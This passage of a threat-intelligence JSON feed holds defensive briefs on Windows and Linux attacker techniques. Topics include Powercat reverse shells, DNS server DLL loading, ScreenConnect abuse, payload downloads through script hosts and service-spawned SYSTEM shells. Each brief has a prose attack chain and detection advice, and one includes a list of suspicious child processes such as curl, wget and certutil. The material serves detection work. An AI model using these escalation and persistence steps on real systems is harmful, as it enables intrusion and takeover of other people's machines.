Overflow","url":"https://feed.craftedsignal.io/briefs/2026-03-jetaudio-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","lateral-movement","powershell"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003ePowercat is a PowerShell script that functions similarly to the traditional Netcat utility, allowing for network communication using TCP and UDP. Attackers can use Powercat to establish reverse shells, transfer files, and perform port scanning within a compromised environment. This activity is often employed during post-exploitation phases to maintain access and propagate further into the network. Defenders should be aware of PowerShell scripts invoking Powercat, especially in environments…\u003c/p\u003e\n","date_modified":"2024-11-04T14:27:00Z","date_published":"2024-11-04T14:27:00Z","id":"/briefs/2024-11-powercat-detection/","summary":"Adversaries may leverage Powercat, a PowerShell implementation of Netcat, to establish command and control channels or perform lateral movement within a compromised network.","title":"Powercat PowerShell Implementation Detection","url":"https://feed.craftedsignal.io/briefs/2024-11-powercat-detection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["execution","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u0026rsquo;env\u0026rsquo; command in Linux is typically used to run a program in a modified environment without altering the existing environment variables. However, attackers can abuse this command to invoke a shell directly, potentially bypassing restricted environments. This is often a technique used for privilege escalation or executing arbitrary commands in situations where direct shell access is limited. 
This activity matters for defenders because it can indicate an attacker attempting to gain…\u003c/p\u003e\n","date_modified":"2024-10-26T12:00:00Z","date_published":"2024-10-26T12:00:00Z","id":"/briefs/2024-10-env-shell-invocation/","summary":"The 'env' command is used to invoke a shell on Linux systems, potentially bypassing restricted environments or escalating privileges to execute arbitrary commands.","title":"Linux Shell Invocation via Env Command","url":"https://feed.craftedsignal.io/briefs/2024-10-env-shell-invocation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["privilege-escalation","execution","persistence","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThe detection rule identifies the loading of unusual DLLs by the Windows DNS Server process (dns.exe), potentially indicating the abuse of the ServerLevelPluginDll functionality, as described in public research and proof-of-concept code. This technique allows attackers to load arbitrary DLLs into the DNS service, leading to privilege escalation and remote code execution with SYSTEM privileges. The rule focuses on detecting unsigned or untrusted DLLs loaded by dns.exe, highlighting potential exploitation attempts and unauthorized modifications to the DNS service. Successful exploitation grants the attacker elevated privileges, allowing them to perform malicious actions on the system. 
The rule is designed for data generated by Elastic Defend and supports Sysmon Event ID 7 (Image Loaded) as an additional data source.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the DNS Server configuration to enable the loading of server-level plugin DLLs.\u003c/li\u003e\n\u003cli\u003eThe attacker places a malicious, unsigned DLL in a location accessible to the DNS service.\u003c/li\u003e\n\u003cli\u003eThe DNS service (dns.exe) loads the malicious DLL upon startup or configuration change.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes code within the context of the DNS service, inheriting SYSTEM privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the elevated privileges to perform malicious actions, such as installing backdoors or modifying system settings.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence by ensuring the malicious DLL is loaded on subsequent system restarts.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code with SYSTEM privileges, granting them complete control over the compromised system. This can lead to data theft, system corruption, or the installation of persistent backdoors. 
The impact includes potential privilege escalation, remote code execution, and complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Unsigned DLL loaded by DNS Service\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnsure Sysmon Event ID 7 (Image Loaded) is enabled to provide the necessary data for the detection rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by reviewing the DLL file path and code signature status.\u003c/li\u003e\n\u003cli\u003eRegularly review and validate the DNS server configuration to ensure that only trusted DLLs are loaded.\u003c/li\u003e\n\u003cli\u003eImplement code signing policies to prevent the loading of unsigned DLLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-07-03T12:00:00Z","date_published":"2024-07-03T12:00:00Z","id":"/briefs/2024-07-unsigned-dns-dll-load/","summary":"The rule identifies the loading of unusual or unsigned DLLs by the DNS Server process, which can indicate exploitation of the ServerLevelPluginDll functionality, potentially leading to privilege escalation and remote code execution with SYSTEM privileges.","title":"Unsigned DLL Loaded by DNS Service","url":"https://feed.craftedsignal.io/briefs/2024-07-unsigned-dns-dll-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Management Console File","Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eAttackers may exploit Microsoft Management Console (MMC) by executing .msc files from non-standard directories to bypass security controls. This technique can be used for initial access and execution. 
This detection focuses on identifying the execution of \u003ccode\u003emmc.exe\u003c/code\u003e with \u003ccode\u003e.msc\u003c/code\u003e files from paths outside the typical system directories, which are generally considered trusted. By monitoring process executions and filtering out known legitimate paths, analysts can identify potentially malicious activity related to the misuse of MMC. The rule aims to detect deviations from standard administrative practices that could indicate unauthorized access or command execution via malicious or compromised \u003ccode\u003e.msc\u003c/code\u003e files. The detection logic specifically excludes executions from common directories like \u003ccode\u003eSystem32\u003c/code\u003e, \u003ccode\u003eSysWOW64\u003c/code\u003e, and \u003ccode\u003eProgram Files\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through an unspecified method.\u003c/li\u003e\n\u003cli\u003eThe attacker places a malicious \u003ccode\u003e.msc\u003c/code\u003e file in an unusual or untrusted directory (e.g., \u003ccode\u003eC:\\Users\\Public\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003emmc.exe\u003c/code\u003e with the malicious \u003ccode\u003e.msc\u003c/code\u003e file as an argument from the untrusted path.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emmc.exe\u003c/code\u003e processes the \u003ccode\u003e.msc\u003c/code\u003e file, potentially executing embedded commands or scripts.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003e.msc\u003c/code\u003e file performs unauthorized actions on the system, such as modifying system settings or executing arbitrary code.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the execution context of \u003ccode\u003emmc.exe\u003c/code\u003e to bypass security controls and escalate privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker 
may establish persistence by creating a scheduled task or modifying registry keys to execute the malicious \u003ccode\u003e.msc\u003c/code\u003e file automatically.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access, command execution, and privilege escalation, potentially compromising the entire system. While specific victim counts or sector targeting are not available, the technique is applicable across various Windows environments. The use of a trusted system binary like \u003ccode\u003emmc.exe\u003c/code\u003e for malicious purposes can evade traditional security measures, making detection more challenging.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eMicrosoft Management Console File from Unusual Path\u003c/code\u003e to detect the execution of \u003ccode\u003emmc.exe\u003c/code\u003e with \u003ccode\u003e.msc\u003c/code\u003e files from untrusted paths.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments to provide the necessary data for the Sigma rule to function effectively.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the origin and content of the \u003ccode\u003e.msc\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eConsider implementing application control policies to restrict the execution of \u003ccode\u003e.msc\u003c/code\u003e files to authorized directories only.\u003c/li\u003e\n\u003cli\u003eReview and audit the use of MMC in the environment to identify any legitimate use cases that might trigger false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-07-03T10:00:00Z","date_published":"2024-07-03T10:00:00Z","id":"/briefs/2024-07-mmc-untrusted-path/","summary":"Adversaries may use Microsoft Management Console (MMC) files from untrusted 
paths to bypass security controls for initial access and execution on Windows systems.","title":"Microsoft Management Console File Execution from Unusual Path","url":"https://feed.craftedsignal.io/briefs/2024-07-mmc-untrusted-path/"},{"_cs_actors":[],"_cs_cves":[{"cvss":10,"id":"CVE-2024-1709"},{"cvss":8.4,"id":"CVE-2024-1708"}],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","ScreenConnect"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","defense-evasion","execution","persistence","screenconnect"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of suspicious activities related to the ScreenConnect remote access tool. ScreenConnect is legitimate remote support software, but adversaries can exploit it to execute unauthorized commands on compromised systems. This detection identifies suspicious child processes spawned by ScreenConnect client processes, such as \u003ccode\u003eScreenConnect.ClientService.exe\u003c/code\u003e or \u003ccode\u003eScreenConnect.WindowsClient.exe\u003c/code\u003e, which can indicate malicious activities such as spawning PowerShell or cmd.exe with unusual arguments. This activity can indicate potential abuse of remote access capabilities, leading to data exfiltration, command and control communication, or the establishment of persistence mechanisms. Recent exploitation of CVE-2024-1709 and CVE-2024-1708 has highlighted the risk associated with ScreenConnect exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to a system with ScreenConnect installed. 
This could be achieved through exploiting vulnerabilities like CVE-2024-1709 and CVE-2024-1708, or through credential compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses ScreenConnect to connect to the compromised system remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the ScreenConnect interface to execute commands on the remote system.\u003c/li\u003e\n\u003cli\u003eThe attacker spawns a command interpreter, such as \u003ccode\u003ecmd.exe\u003c/code\u003e, using ScreenConnect. This process is a child process of the ScreenConnect client process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecmd.exe\u003c/code\u003e to execute malicious commands, such as downloading and executing a malicious payload.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker spawns \u003ccode\u003epowershell.exe\u003c/code\u003e with encoded commands or commands to download and execute malicious payloads from a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence by creating a scheduled task using \u003ccode\u003eschtasks.exe\u003c/code\u003e or creates a new service using \u003ccode\u003esc.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses tools like \u003ccode\u003enet.exe\u003c/code\u003e to modify user accounts or privileges to maintain access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, installation of malware, and establishment of persistent access to the compromised system. This can result in data theft, disruption of services, and further lateral movement within the network. 
The number of victims and specific sectors targeted varies depending on the attacker\u0026rsquo;s objectives, but the impact can be significant for organizations relying on ScreenConnect for remote support.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious child processes spawned by ScreenConnect and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for ScreenConnect client processes spawning suspicious child processes like \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eschtasks.exe\u003c/code\u003e, \u003ccode\u003esc.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003essh.exe\u003c/code\u003e, \u003ccode\u003escp.exe\u003c/code\u003e, \u003ccode\u003ewevtutil.exe\u003c/code\u003e, \u003ccode\u003ewget.exe\u003c/code\u003e, or \u003ccode\u003ewmic.exe\u003c/code\u003e as detailed in the Sigma rules.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the necessary process execution data to activate the rules above.\u003c/li\u003e\n\u003cli\u003eReview and revoke any unauthorized user accounts or privileges that may have been created or modified using tools like \u003ccode\u003enet.exe\u003c/code\u003e as described in the attack chain.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-16T16:10:00Z","date_published":"2024-05-16T16:10:00Z","id":"/briefs/2024-05-screenconnect-child-process/","summary":"This rule identifies suspicious child processes spawned by ScreenConnect client processes, 
potentially indicating unauthorized access and command execution abusing ScreenConnect remote access software to perform malicious activities such as data exfiltration or establishing persistence.","title":"Suspicious ScreenConnect Client Child Process Activity","url":"https://feed.craftedsignal.io/briefs/2024-05-screenconnect-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","persistence","execution","registry-modification"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may leverage scripting engines, such as \u003ccode\u003ewscript.exe\u003c/code\u003e and \u003ccode\u003ecscript.exe\u003c/code\u003e, to directly modify the Windows Registry. These scripting engines are often abused for malicious purposes, including establishing persistence, escalating privileges, or disabling security controls. These scripting engines can modify the registry without using standard tools like \u003ccode\u003eregedit.exe\u003c/code\u003e or \u003ccode\u003ereg.exe\u003c/code\u003e, making it harder to detect malicious registry changes. 
Defenders should be aware of processes using these engines to modify the registry, as this behavior is uncommon in legitimate software installations or administrative tasks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system, potentially through social engineering or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script (VBScript, JScript) via \u003ccode\u003ewscript.exe\u003c/code\u003e or \u003ccode\u003ecscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script contains commands to modify specific registry keys, such as the Run key for persistence (T1547.001).\u003c/li\u003e\n\u003cli\u003eThe scripting engine process (e.g., \u003ccode\u003ewscript.exe\u003c/code\u003e) directly interacts with the Windows Registry to set the new values.\u003c/li\u003e\n\u003cli\u003eUpon system restart or user logon, the modified registry key triggers the execution of a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence on the compromised system, allowing for continued access and control.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the persistent access to perform lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to persistent access on compromised systems, enabling attackers to execute malicious code, steal sensitive information, or disrupt critical services. The registry modifications performed by scripting engines can bypass traditional security measures and make it difficult to detect and remediate the attack. 
This can result in significant data loss, financial damage, and reputational harm to affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Registry Tampering by Potentially Suspicious Processes\u0026rdquo; to your SIEM to detect suspicious registry modifications made by scripting engines.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule \u0026ldquo;Registry Tampering by Potentially Suspicious Processes\u0026rdquo; for unusual or unauthorized registry changes.\u003c/li\u003e\n\u003cli\u003eMonitor registry events for modifications made by processes such as \u003ccode\u003ewscript.exe\u003c/code\u003e and \u003ccode\u003ecscript.exe\u003c/code\u003e (logsource: registry_event).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-29T12:00:00Z","date_published":"2024-01-29T12:00:00Z","id":"/briefs/2024-01-29-susp-reg-mod/","summary":"The use of scripting engines like WScript and CScript to modify the Windows registry can indicate an attempt to bypass standard tools and evade defenses, potentially for persistence or other malicious activities.","title":"Suspicious Registry Modifications by Scripting Engines","url":"https://feed.craftedsignal.io/briefs/2024-01-29-susp-reg-mod/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Script Host"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","windows","script_interpreter"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers commonly use Windows Script Host (WSH) scripts as an initial access method or to download tools and utilities. This involves using built-in Windows script interpreters like \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e to download executable files from remote destinations. 
This behavior is significant because it allows attackers to bypass traditional defenses and establish a foothold in the system or download further tools. Defenders should monitor for suspicious network connections initiated by script interpreters followed by the creation of executable files on the system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (delivery mechanism not specified in source).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script using \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script interpreter makes an outbound network connection to a remote server.\u003c/li\u003e\n\u003cli\u003eThe remote server hosts a malicious executable file (e.g., .exe, .dll).\u003c/li\u003e\n\u003cli\u003eThe script downloads the malicious executable to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded malicious file to establish persistence or further compromise the system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs additional actions, such as lateral movement or data exfiltration (not detailed in the source).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and further compromise of the affected system. This can result in data breaches, financial losses, and reputational damage. 
The source does not contain specific victim numbers or sectors targeted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - File Creation\u0026rdquo; to your SIEM to detect the creation of executable files after network activity from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - Network Connection\u0026rdquo; to detect network connections from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) and Event ID 11 (File Create) for enhanced visibility into network and file activity related to script interpreters.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T12:00:00Z","date_published":"2024-01-28T12:00:00Z","id":"/briefs/2024-01-28-remote-file-copy-scripts/","summary":"Attackers are using Windows script interpreters (cscript.exe or wscript.exe) to download executable files from remote locations to deliver second-stage payloads or download tools.","title":"Remote File Download via Script Interpreter","url":"https://feed.craftedsignal.io/briefs/2024-01-28-remote-file-copy-scripts/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows","Elastic Defend","Microsoft Defender XDR"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","privilege_escalation","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers may configure existing Windows services or create new ones to execute system shells, in order to elevate their privileges from administrator to SYSTEM. This tactic is used to gain SYSTEM permissions and establish persistence. 
The detection rule focuses on identifying instances where \u003ccode\u003eservices.exe\u003c/code\u003e is the parent process of a command shell (cmd.exe, powershell.exe, pwsh.exe, powershell_ise.exe), indicating that a service is being abused to run a shell. The rule is designed to work with data from Elastic Defend, CrowdStrike, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Windows Security Event Logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the system with administrator privileges.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a legitimate service or creates a new service to abuse for privilege escalation.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the service configuration to execute a command shell (cmd.exe, powershell.exe, pwsh.exe, or powershell_ise.exe). This may involve modifying the service\u0026rsquo;s executable path or adding command-line arguments.\u003c/li\u003e\n\u003cli\u003eThe system\u0026rsquo;s Service Control Manager (SCM) starts the service.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservices.exe\u003c/code\u003e spawns the configured command shell process.\u003c/li\u003e\n\u003cli\u003eThe command shell executes with SYSTEM privileges.\u003c/li\u003e\n\u003cli\u003eAttacker uses the SYSTEM shell to perform malicious activities, such as installing malware, accessing sensitive data, or creating new user accounts.\u003c/li\u003e\n\u003cli\u003eThe service continues to run, providing persistent access to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to privilege escalation to SYSTEM, granting the attacker complete control over the compromised system. This can result in data theft, malware installation, or further lateral movement within the network. 
The rule has a risk score of 47 and is categorized as medium severity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSystem Shells via Services\u003c/code\u003e to detect the execution of command shells spawned by \u003ccode\u003eservices.exe\u003c/code\u003e within your SIEM environment, and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any process creation events where \u003ccode\u003eservices.exe\u003c/code\u003e is the parent process of \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003epwsh.exe\u003c/code\u003e, or \u003ccode\u003epowershell_ise.exe\u003c/code\u003e using the investigation guide provided in the content section.\u003c/li\u003e\n\u003cli\u003eReview service creation and modification events in Windows Event Logs (Event IDs 4697 and 7045) for suspicious entries.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture detailed process information.\u003c/li\u003e\n\u003cli\u003eUtilize osquery to retrieve detailed service information to identify potentially malicious services. 
Reference queries $osquery_0, $osquery_1, and $osquery_2 in the investigation guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T12:00:00Z","date_published":"2024-01-26T12:00:00Z","id":"/briefs/2024-01-system-shells-via-services/","summary":"Attackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM, using services.exe as the parent process of the shell.","title":"System Shells Launched via Windows Services","url":"https://feed.craftedsignal.io/briefs/2024-01-system-shells-via-services/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel","Crowdstrike"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eThis detection rule identifies anomalous creation or modification of executable files by critical Windows system processes, like \u003ccode\u003esmss.exe\u003c/code\u003e, \u003ccode\u003ecsrss.exe\u003c/code\u003e, and \u003ccode\u003elsass.exe\u003c/code\u003e. Attackers may attempt to leverage these processes to evade detection, and the rule is designed to detect such activities. The rule leverages data from Elastic Defend, Microsoft Defender XDR, SentinelOne, CrowdStrike, and Sysmon. It provides investigation steps to help analysts triage and analyze potential incidents, focusing on the identity of the writing process, its lineage, and the characteristics of the written file. This rule is designed to detect potential remote code execution or other forms of exploitation targeting Windows systems. 
The rule logic excludes specific legitimate file paths to minimize false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through methods such as phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes code on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to escalate privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a system critical process to create or modify an executable file.\u003c/li\u003e\n\u003cli\u003eThe created/modified file may be a backdoor, malware component, or a tool for further exploitation.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the created executable to establish persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the newly created executable to perform lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution with elevated privileges. The number of victims is dependent on the scope of the initial compromise. The targeted sectors include any organization running vulnerable Windows systems. 
If the attack succeeds, the adversary can gain full control over the system, leading to data theft, system disruption, or further propagation of malware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Unusual Executable File Creation by a System Critical Process\u0026rdquo; detection rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon file creation logging (Event ID 11) to enhance detection capabilities (see setup instructions in the rule source).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, paying close attention to the writing process\u0026rsquo;s identity, lineage, and the characteristics of the written file as detailed in the rule\u0026rsquo;s triage and analysis section.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts from this rule with other endpoint and network activity to identify the scope of the potential compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-25T12:00:00Z","date_published":"2024-01-25T12:00:00Z","id":"/briefs/2024-01-25-unusual-executable-file-creation/","summary":"The rule identifies unexpected executable file creation or modification by critical Windows processes, potentially indicating remote code execution or exploitation attempts.","title":"Unusual Executable File Creation by a System Critical Process","url":"https://feed.craftedsignal.io/briefs/2024-01-25-unusual-executable-file-creation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 Defender","SentinelOne Cloud Funnel","Crowdstrike"],"_cs_severities":["medium"],"_cs_tags":["execution","windows","scripting","archive"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers commonly use archive files (ZIP, RAR, 7z) to deliver malicious scripts, such as JScript and VBScript, to Windows systems. 
This technique allows them to bypass some initial security checks and deliver payloads that can execute arbitrary code. The \u0026ldquo;Windows Script Execution from Archive\u0026rdquo; detection identifies instances where Windows Script Host (wscript.exe) is launched from temporary directories containing extracted archive contents. This activity can indicate a user has opened a malicious archive, leading to potential malware execution. This detection focuses on the parent-child process relationship, where explorer.exe, winrar.exe, or 7zFM.exe spawns wscript.exe to execute scripts from the temp directory.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user receives a malicious archive file (e.g., ZIP, RAR, 7z) via email or downloads it from a website.\u003c/li\u003e\n\u003cli\u003eThe user opens the archive file using a file archiver tool like Explorer, WinRAR, or 7-Zip.\u003c/li\u003e\n\u003cli\u003eThe archiver extracts the contents, including a malicious JScript (.js) or VBScript (.vbs) file, to a temporary directory, such as \u003ccode\u003e\\Users\\*\\AppData\\Local\\Temp\\7z*\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe user (or the archiver tool) inadvertently executes the extracted script using Windows Script Host (wscript.exe).\u003c/li\u003e\n\u003cli\u003eWscript.exe executes the malicious script, which may perform a variety of actions, such as downloading and executing additional payloads.\u003c/li\u003e\n\u003cli\u003eThe script establishes persistence via registry modification, adding a run key to execute upon system startup.\u003c/li\u003e\n\u003cli\u003eThe script connects to a command-and-control server to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the compromised system and begins lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack of this nature 
